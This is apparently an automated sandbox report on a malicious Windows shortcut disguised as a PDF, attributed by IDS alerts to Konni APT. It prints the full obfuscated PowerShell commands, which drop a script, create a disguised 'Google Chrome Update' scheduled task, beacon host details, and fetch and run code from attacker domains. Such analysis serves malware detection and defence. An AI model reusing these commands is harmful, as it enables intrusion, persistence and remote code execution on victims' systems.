| Field | Value |
|---|---|
| File name | 0e75a7d2077c13eb5c8b1329ea3b254d56b1b9210bacf5998ead7c17e62d1247 |
| Full analysis | https://app.any.run/tasks/ce2a5153-21b2-46ae-8acd-96acca1e12c2 |
| Verdict | Malicious activity |
| Analysis date | June 18, 2025, 04:50:04 |
| OS | Windows 10 Professional (build: 19044, 64 bit) |
| Tags | |
| Indicators | |
| MIME | application/x-ms-shortcut |
| File info | MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Unicoded, EnableTargetMetadata, Archive, ctime=Tue Mar 19 04:46:58 2019, atime=Sat May 10 02:04:15 2025, mtime=Tue Mar 19 04:46:58 2019, length=0, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\windowspowershell\v1.0\PoWErSHeLl.exe" |
| MD5 | C0B47DC97CF9552B564CB227B6DE12C3 |
| SHA1 | 3480DD059ADB53A6BE9D063D16F6F22692C009D1 |
| SHA256 | 0E75A7D2077C13EB5C8B1329EA3B254D56B1B9210BACF5998EAD7C17E62D1247 |
| SSDEEP | 6144:mCd55VBbMjHBhmuqXjlCNqPfN7yWUxHeo6Q:mMXbMjhwuqXjlCNaIxHl |
| Field | Value |
|---|---|
| File type | .lnk, Windows Shortcut (100) |
| Flags | IDList, LinkInfo, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, TargetMetadata |
| FileAttributes | Archive |
| CreateDate | 2019:03:19 04:46:58+00:00 |
| AccessDate | 2025:05:10 02:04:15+00:00 |
| ModifyDate | 2019:03:19 04:46:58+00:00 |
| TargetFileSize | - |
| IconIndex | (none) |
| RunWindow | Show Minimized No Activate |
| HotKey | (none) |
| DriveType | Fixed Disk |
| DriveSerialNumber | F423-8020 |
| VolumeLabel | - |
| LocalBasePath | C:\Windows\System32\windowspowershell\v1.0\PoWErSHeLl.exe |
| Description | Type: PDF File Size: 202KB Date modified: 05/08/2025 10:50 |
| RelativePath | ..\..\..\Windows\System32\notepad.exe |
| PID | CMD | Path | Indicators | Parent process | User | Company | Integrity Level | Description | Exit code | Version |
|---|---|---|---|---|---|---|---|---|---|---|
| 1068 | "C:\Windows\System32\windowspowershell\v1.0\PoWErSHeLl.exe" -ep bypass -c "$orge=[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('JGRhdGEgPSAiZG1GeUlHNWhjM0psWkdScGJtVTlJRzVsZHlCQlkzUnBkbVZZVDJKcVpXTjBLQ0pYVTJOeWFYQjBMbE5vWld4c0lpazdEUXB1WVhOeVpXUmthVzVsTG5KMWJpZ2ljRzkzWlhKemFHVnNiQ0F0WlhBZ1lubHdZWE56SUMxM0lHaHBaR1JsYmlBdFpTQmNJbE5SUWtaQlJtZEJTMEZCYjBGRk5FRmFVVUl6UVVNd1FWUjNRbWxCUjI5QldsRkNha0ZJVVVGSlFVSlBRVWRWUVdSQlFYVkJSbU5CV2xGQ2FVRkZUVUZpUVVKd1FVZFZRV0puUWpCQlEydEJUR2RDUlVGSE9FRmtkMEoxUVVkM1FXSjNRbWhCUjFGQlZYZENNRUZJU1VGaFVVSjFRVWRqUVV0QlFXNUJSMmRCWkVGQ01FRklRVUZQWjBGMlFVTTRRV1JCUW5aQlIxVkJZM2RCZFVGSE5FRmhVVUpyUVVjMFFWbFJRakpCUjFWQlkyZEJkVUZIVFVGaVFVSjJRVWhWUVZwQlFYWkJSMWxCWTJkQ2JFRkhWVUZOUVVFeFFVUkZRVTFCUVhaQlIxRkJZbWRCZFVGSVFVRmhRVUozUVVRNFFXSm5RbWhCUnpCQldsRkJPVUZEWTBGTGQwRnJRVWRWUVdKblFqSkJSRzlCVVhkQ1VFRkZNRUZWUVVKV1FVWlJRVkpSUWxOQlJUUkJVVkZDVGtGRlZVRkxkMEZ1UVVOWlFXTkJRbmxCUjFWQldtZENjRUZJWjBGUVVVSnVRVWRqUVVwblFqQkJTRUZCVUZGQmJrRkRjMEZYZDBKR1FVYzBRV1JuUW5CQlNFbEJZbmRDZFVGSE1FRmFVVUoxUVVoUlFWaFJRVFpCUkc5QlZIZENWRUZHV1VGYVVVSjVRVWhOUVdGUlFuWkJSelJCUzFGQmNFRkVjMEZjSWlJc0lEQXBPdz09IjsNCiRmbmFtZSA9ICRlbnY6QVBQREFUQSArICJcTWljcm9zb2Z0XFdpbmRvd3NcVGVtcGxhdGVzXGNocm9tZXVwZGF0ZS5qcyI7DQpbSU8uRmlsZV06OldyaXRlQWxsQnl0ZXMoJGZuYW1lLCBbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGRhdGEpKTsNCg0KJG1hZ2kgPSAiY21kIC9jIHNjaHRhc2tzIC9jcmVhdGUgL3NjIG1pbnV0ZSAvbW8gMSAvdG4gJ0dvb2dsZSBDaHJvbWUgVXBkYXRlJyAvdHIgJ3dzY3JpcHQuZXhlICIgKyAkZm5hbWUgKyAiJyAvZiI7DQpJRVggJG1hZ2k7DQoNCiRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50Ow0KJHVybCA9ICJodHRwOi8va25lZXMubmlkbmF2ZXIuY2xvdWQvZnJlZTA1MTAvdmlldy5waHA/bmFtZT0iKyRlbnY6Q09NUFVURVJOQU1FKyImdHA9IitbRW52aXJvbm1lbnRdOjpPU1ZlcnNpb247DQokZm5hbWUgPSAkZW52OlVTRVJQUk9GSUxFICsgJ1xBcHBEYXRhXExvY2FsXFRlbXBcVGVtcGxhdGUucGRmJzsNCiRjbGllbnQuRG93bmxvYWRGaWxlKCR1cmwsICRmbmFtZSk7DQpTdGFydC1Qcm9jZXNzICgoUmVzb2x2ZS1QYXRoICRmbmFtZSkuUGF0aCk7'));IEX($orge);" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 10.0.19041.1 (WinBuild.160101.0800) |
| 1948 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | admin | Microsoft Corporation | MEDIUM | Console Window Host | 0 | 10.0.19041.1 (WinBuild.160101.0800) |
| 2200 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | — | services.exe | NETWORK SERVICE | Microsoft Corporation | SYSTEM | Host Process for Windows Services | — | 10.0.19041.1 (WinBuild.160101.0800) |
| 3960 | "wscript.exe" C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\chromeupdate.js | C:\Windows\System32\wscript.exe | — | svchost.exe | admin | Microsoft Corporation | MEDIUM | Microsoft ® Windows Based Script Host | 0 | 5.812.10240.16384 |
| 3976 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | admin | Microsoft Corporation | MEDIUM | Console Window Host | 0 | 10.0.19041.1 (WinBuild.160101.0800) |
| 4684 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | admin | Microsoft Corporation | MEDIUM | Console Window Host | 0 | 10.0.19041.1 (WinBuild.160101.0800) |
| 4764 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -e "SQBFAFgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdABvAGUAcwAuAG4AaQBkAG4AYQB2AGUAcgAuAGMAbABvAHUAZAAvAGYAcgBlAGUAMAA1ADEAMAAvAGQAbgAuAHAAaABwAD8AbgBhAG0AZQA9ACcAKwAkAGUAbgB2ADoAQwBPAE0AUABVAFQARQBSAE4AQQBNAEUAKwAnACYAcAByAGUAZgBpAHgAPQBnAGcAJgB0AHAAPQAnACsAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4AKQApADsA" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wscript.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 1 | 10.0.19041.1 (WinBuild.160101.0800) |
| 5244 | "wscript.exe" C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\chromeupdate.js | C:\Windows\System32\wscript.exe | — | svchost.exe | admin | Microsoft Corporation | MEDIUM | Microsoft ® Windows Based Script Host | 0 | 5.812.10240.16384 |
| 5348 | "C:\WINDOWS\system32\cmd.exe" /c schtasks /create /sc minute /mo 1 /tn "Google Chrome Update" /tr "wscript.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\chromeupdate.js" /f | C:\Windows\System32\cmd.exe | — | powershell.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 10.0.19041.1 (WinBuild.160101.0800) |
| 6012 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | admin | Microsoft Corporation | MEDIUM | Windows Activation Client | 0 | 10.0.19041.1 (WinBuild.160101.0800) |
| PID | Process | Operation | Key | Name | Value |
|---|---|---|---|---|---|
| 3960 | wscript.exe | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe | JScriptSetScriptStateStarted | 7E26180000000000 |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 1068 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S770E6F5X4YSC5NFXVHM.temp | binary | AAF4C3F06AD9DAC0F31F7CADE764D7C3 | ECEBF1BB7CD8810FAFEDF7E864CECB9700FF3A46028FEEE2FE8A41A450F8DFD1 |
| 1068 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3ixp0boy.zgq.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 1068 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\chromeupdate.js | text | 613F39F09ADF4521C50877800E7024A6 | B696F6998EEF0499BAA0836357062BB8AEC76D0F59F519CA6383F3F48BB3DECC |
| 1068 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\512ce8f617a50017.customDestinations-ms | binary | AAF4C3F06AD9DAC0F31F7CADE764D7C3 | ECEBF1BB7CD8810FAFEDF7E864CECB9700FF3A46028FEEE2FE8A41A450F8DFD1 |
| 4764 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0b0brq5w.vxb.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 4764 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uqfjd1b4.xcs.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 6220 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_obk32fy5.1ts.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 6220 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vgiqrky4.ufu.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 1068 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | 544BA93A04EC706006704A03E2FA0F94 | 4B1ACFAA099D19FC7628DBE23A8519FC27C39430ADCD84CD1FE9BF35FDFA4143 |
| 1068 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_oe1wyowi.oec.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 3732 | RUXIMICS.exe | GET | 200 | 23.216.77.25:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
| 1268 | svchost.exe | GET | 200 | 23.216.77.25:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
| 1068 | powershell.exe | GET | 404 | 156.67.75.194:80 | http://knees.nidnaver.cloud/free0510/view.php?name=DESKTOP-JGLLJLD&tp=Microsoft%20Windows%20NT%2010.0.19045.0 | unknown | — | — | malicious |
| 5944 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
| 6220 | powershell.exe | GET | 404 | 156.67.75.194:80 | http://toes.nidnaver.cloud/free0510/dn.php?name=DESKTOP-JGLLJLD&prefix=gg&tp=Microsoft%20Windows%20NT%2010.0.19045.0 | unknown | — | — | malicious |
| — | — | POST | 500 | 20.83.72.98:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted |
| 4764 | powershell.exe | GET | 404 | 156.67.75.194:80 | http://toes.nidnaver.cloud/free0510/dn.php?name=DESKTOP-JGLLJLD&prefix=gg&tp=Microsoft%20Windows%20NT%2010.0.19045.0 | unknown | — | — | malicious |
| — | — | POST | 500 | 20.83.72.98:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted |
| 3732 | RUXIMICS.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
| 5944 | MoUsoCoreWorker.exe | GET | 200 | 23.216.77.25:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
| 5944 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
| 1268 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
| 3732 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
| 4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
| 3732 | RUXIMICS.exe | 23.216.77.25:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
| 1268 | svchost.exe | 23.216.77.25:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
| 5944 | MoUsoCoreWorker.exe | 23.216.77.25:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
| 3732 | RUXIMICS.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
| 1268 | svchost.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
| Domain | IP | Reputation |
|---|---|---|
| settings-win.data.microsoft.com | — | whitelisted |
| google.com | — | whitelisted |
| crl.microsoft.com | — | whitelisted |
| www.microsoft.com | — | whitelisted |
| knees.nidnaver.cloud | — | malicious |
| activation-v2.sls.microsoft.com | — | whitelisted |
| toes.nidnaver.cloud | — | malicious |
| self.events.data.microsoft.com | — | whitelisted |
| PID | Process | Class | Message |
|---|---|---|---|
| 1068 | powershell.exe | A Network Trojan was detected | ET MALWARE Konni APT MalDoc Activity (GET) |
| 6220 | powershell.exe | A Network Trojan was detected | ET MALWARE Konni APT MalDoc Activity (GET) |
| 4764 | powershell.exe | A Network Trojan was detected | ET MALWARE Konni APT MalDoc Activity (GET) |